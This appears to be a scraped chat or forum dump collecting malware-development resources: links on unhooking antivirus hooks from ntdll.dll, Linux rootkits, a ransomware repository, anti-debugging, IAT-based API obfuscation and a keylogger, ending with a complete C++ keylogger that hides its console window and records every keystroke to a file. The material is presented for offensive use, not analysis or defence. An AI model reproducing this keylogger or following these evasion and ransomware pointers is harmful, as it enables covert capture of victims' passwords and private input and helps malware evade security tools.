https://rioasmara.com/2022/02/28/process-unhooking-by-reading-ntdll-dll-fresh-copy/
Cyber Security Architect | Red/Blue Teaming | Exploit/Malware Analysis
Process unhooking by reading ntdll.dll fresh copy
Hi All, I am going to share a simple code to allow you to unhook AV engine from the NTDLL by overwritting dll loaded into the process with the fresh copy of the dll. The expectation of overwritting…
📖#story
Bulgaria in the 1980s became known as the ‘virus factory’, where hundreds of malicious computer programs were unleashed to wreak havoc. But who was writing them, and why?
https://www.theguardian.com/news/2023/may/09/on-the-trail-of-the-dark-avenger-the-most-dangerous-virus-writer-in-the-world
the Guardian
On the trail of the Dark Avenger: the most dangerous virus writer in the world
What Windows binaries can do:
https://lolbas-project.github.io/
<Linux~>
techniques:
https://tmpout.sh/
https://cpl0.zip
crash course on linux rootkits:
https://xcellerator.github.io/categories/linux/
possibly the best resource at ur disposal, kernel source cross referencer
https://elixir.bootlin.com/linux/latest/source/kernel
linux internals:
https://github.com/theja0473/My-Lib-Books-1/blob/master/UnderStanding%20The%20Linux%20Kernel%203rd%20Edition%20V413HAV.pdf
use google translate but these chinese people have some insane techniques:
https://blog.csdn.net
linux :: TheXcellerator
-malware creation to data exfiltration
https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/
https://blog.hacktivesecurity.com/index.php/2023/06/05/inside-the-mind-of-a-cyber-attacker-from-malware-creation-to-data-exfiltration-part-1/
Repo containing different types of malware writing concepts
https://github.com/sufyandaredevil/MALWARE_DEV
IHkey is win32 ransomware built using VS 2022 + C++ 17
(Lot of technique)
https://github.com/mr3moe/IHkey
A collection of c++ programs that demonstrate common ways to detect the presence of an attached debugger.
https://github.com/ThomasThelen/Anti-Debugging
This is pretty straightforward. Let's say I've used VirtualProtect and I want to obfuscate it with Sleep: the tool will manipulate the IAT so that the thunk that points to VirtualProtect will point instead to Sleep. Now, on executing the file, the Windows loader will load Sleep instead of VirtualProtect and move execution to the entry point; from there the execution will be redirected to the shellcode the tool put there before, to find the address of VirtualProtect and use it to replace the address of Sleep which was assigned before by the loader.
https://github.com/d35ha/CallObfuscator
GitHub
GitHub - d35ha/CallObfuscator: Obfuscate specific windows apis with different apis
Source Byte
Loggy is a keylogger that is created in C++ https://github.com/Black0utDev/Loggy
Simple one I wrote:
#include <Windows.h>
#include <iostream>
#include <fstream>
#include <stdio.h>
#include <string>

using namespace std;

void WriteToLog(LPCSTR text)
{
    ofstream logFile;
    logFile.open("Keys.txt", fstream::app);
    // logFile << text;
    logFile.close();
}

int main()
{
    char key;
    while (TRUE)
    {
        ShowWindow(GetConsoleWindow(), 0);
        Sleep(10);
        for (key = 0x8; key <= 0xBE; key++)
        {
            if (GetAsyncKeyState(key) == -32767)
            {
                ofstream logFile;
                logFile.open("Keys.txt", fstream::app);
                logFile << key;
                logFile.close();
            }
        }
    }
    return 0;
}